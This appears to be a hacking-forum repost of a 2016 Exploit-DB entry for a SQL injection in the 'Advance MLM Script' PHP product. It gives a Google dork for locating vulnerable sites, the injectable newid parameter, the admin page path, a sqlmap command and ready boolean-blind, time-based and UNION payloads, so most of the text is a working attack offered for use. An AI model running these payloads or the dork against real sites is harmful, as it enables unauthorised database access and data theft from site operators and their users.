Exploit Advance MLM Script - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
40466
Проверка EDB
  1. Пройдено
Автор
OON_BOY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2016-10-06
Advance MLM Script - SQL Injection
Код:
[x]========================================================================================================================================[x]
 | Title		: Advance MLM Script SQL Vulnerabilities
 | Software		: Advance MLM Script
 | Vendor		: http://www.i-netsolution.com/
 | Demo         : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
 | Google Dork 	: news_detail.php?newid= © MLM SCRIPT
 | Date         : 06 October 2016
 | Author		: OoN_Boy
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Technology		: PHP
 | Database			: MySQL
 | Price			: $ 199
 | Description      : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
 Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
[x]========================================================================================================================================[x]
 
 
[x]========================================================================================================================================[x]
 | Exploit		: http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
 | Aadmin Page	: http://localhost/[path]/admin/index.php  
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
[x]========================================================================================================================================[x] 

 ---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
---

[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Greetz	:	antisecurity.org batamhacker.or.id
 |				Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
 |				k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]

[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
 
Источник
www.exploit-db.com

Похожие темы